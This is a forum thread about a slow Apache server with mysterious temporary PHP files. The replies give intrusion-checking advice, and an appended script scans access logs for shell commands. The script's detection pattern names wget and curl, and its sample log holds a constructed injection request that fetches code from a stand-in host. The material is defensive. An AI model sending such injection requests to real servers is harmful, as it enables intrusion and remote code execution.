LinuxQuestions.org


smshuja 05-30-2006 02:34 AM

Slow server & Mysterious files in /tmp
 
Hi All,
I have noticed that our server has become quite slow. I also noticed that as soon as I restart Apache, some encrypted files are generated in /tmp, with file names such as php3Gqkez, all of different sizes, and they sometimes get deleted automatically. But when I check the server load from WebHostManager, everything seems normal.

Is there any way I can find out which script is creating these files?

Many thanks
Shuja

Capt_Caveman 05-30-2006 07:27 AM

Who owns those files? Verify the integrity of the Apache binary itself. If you have an rpm-based system you can use rpm -V <path_to_apache>, otherwise use md5sum and compare the hash against a known good version. Also, make sure that the running version of Apache is the actual one and not an alternate trojaned copy by checking the execution path with pstree or ps auxf, and verify that the proper Apache binary is running.

I'd also go through all of the apache logs and look for anything that looks suspicious, especially anything with shell commands in it (like wget, cd, etc). It would also be a good idea to download and install chkrootkit or rkhunter on the system and run a scan.
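
One way to do the log review suggested in the reply above, as an added example that is not part of the original posts: it flags requests whose URL carries a shell command followed by an encoded space. It assumes the common/combined access-log format; the command list, the function names and the sample log lines are constructed for illustration.

```sh
#!/bin/sh
# Added example: triage Apache access logs for shell commands in request URLs.

# A command name preceded by a parameter/command separator and followed by an
# encoded space (%20 or +). The command list is an assumption; extend as needed.
SUSPECT_RE='([=;|&]|%3b|%7c|%26|%20|[+])(wget|curl|lynx|perl|chmod|uname|cd)(%20|[+])'

# scan_access_log FILE  ("-" reads stdin)
# Prints "client<TAB>URL" for each suspicious request; returns 1 if none found.
scan_access_log() {
    awk -F'"' -v re="$SUSPECT_RE" '
        {
            split($2, req, " ")      # $2 is the request line: METHOD URL PROTO
            url = tolower(req[2])    # match case-insensitively
            if (url ~ re) {
                split($1, pre, " ")  # pre[1] is the client address
                printf "%s\t%s\n", pre[1], req[2]
                hits++
            }
        }
        END { exit (hits > 0 ? 0 : 1) }
    ' "$1"
}

# Constructed sample log (documentation addresses, not real traffic).
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [30/May/2006:02:10:01 -0500] "GET /index.php HTTP/1.1" 200 5120
203.0.113.7 - - [30/May/2006:02:11:43 -0500] "GET /gallery.php?cmd=cd%20/tmp;wget%20http://example.invalid/a HTTP/1.0" 200 312
198.51.100.4 - - [30/May/2006:02:12:09 -0500] "GET /search.php?q=linux+security HTTP/1.1" 200 2048
203.0.113.7 - - [30/May/2006:02:13:55 -0500] "GET /gallery.php?cmd=UNAME+-a HTTP/1.0" 200 97
EOF
}

# With an argument, scan that log; without one, scan the embedded sample.
if [ "$#" -gt 0 ]; then
    scan_access_log "$1"
else
    sample_log | scan_access_log -
fi
```

A hit is only a lead: a legitimate query such as q=cd+player also matches, so check each flagged URL against the script it targets and the timestamps of the files appearing in /tmp.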


All times are GMT -5.